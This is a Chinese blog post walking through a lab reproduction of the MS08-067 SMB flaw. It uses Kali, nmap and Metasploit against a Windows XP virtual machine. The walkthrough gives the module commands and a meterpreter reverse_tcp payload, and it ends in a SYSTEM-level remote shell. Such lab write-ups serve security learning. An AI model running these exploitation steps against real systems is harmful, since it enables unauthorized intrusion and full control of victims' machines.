MS08-067漏洞复现(Kali+MSF)

目录:

环境准备:

漏洞原理:

复现步骤


环境准备:

靶机:Windows XP (安装在虚拟机)

攻击机:Kali

攻击工具:nmap 、msfconsole(下文简称MSF)

漏洞原理:

利用XP系统开放的445端口,使用msf对其进行攻击,从而远程到靶机,即进入到靶机的cmd界面,且拥有system最高权限,后果可想而知

复现步骤

1、使用sudo su 切换至root权限,输入密码(密码不可见,直接键入即可)

┌──(carey㉿kaliJD)-[~]
└─$ sudo su 
[sudo] carey 的密码:

2、使用nmap对目标靶机进行扫描,这里因为我们知道用的是445端口就直接对这个端口进行扫描,查看他的状态。

 这里我们看到445端口的状态是open开启的,OK,那就干他。

  3、启动我们的MSF工具,输入msfconsole后回车等待启动完成。

┌──(root㉿kaliJD)-[/home/carey]
└─# msfconsole

 到这就说名启动完成了

 4、输入ms08-067我们查询这个漏洞的信息。

msf6 > search ms08-067

 5、输入use 0 选择第一个模块进入这个攻击的武器库

msf6 > use 0

 6、输入show options,我们看看需要配置什么。

show options

这里我们可以看到RHOSTS没有值,后面的required是yes,yes表示该项必填,RHOSTS表示靶机地址(可以看到下面有个LHOST,表示攻击机的地址,一般都会默认填上本机IP地址),这里我们看到只需要吧rhosts填上

 7、这里我们利用set +name+值得格式写入靶机地址和使用的武器库(以后遇到其他的字段需要写入值时基本都是这个格式)

msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.171.130

msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

再次show options查看写入信息是否正确,检查正确

 8、开始攻击,run

msf6 exploit(windows/smb/ms08_067_netapi) > run

 提示连接了3个回话就表示连接成功

9、输入shell 进入Windows xp的命令行界面,至此就可以为所欲为了。

  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值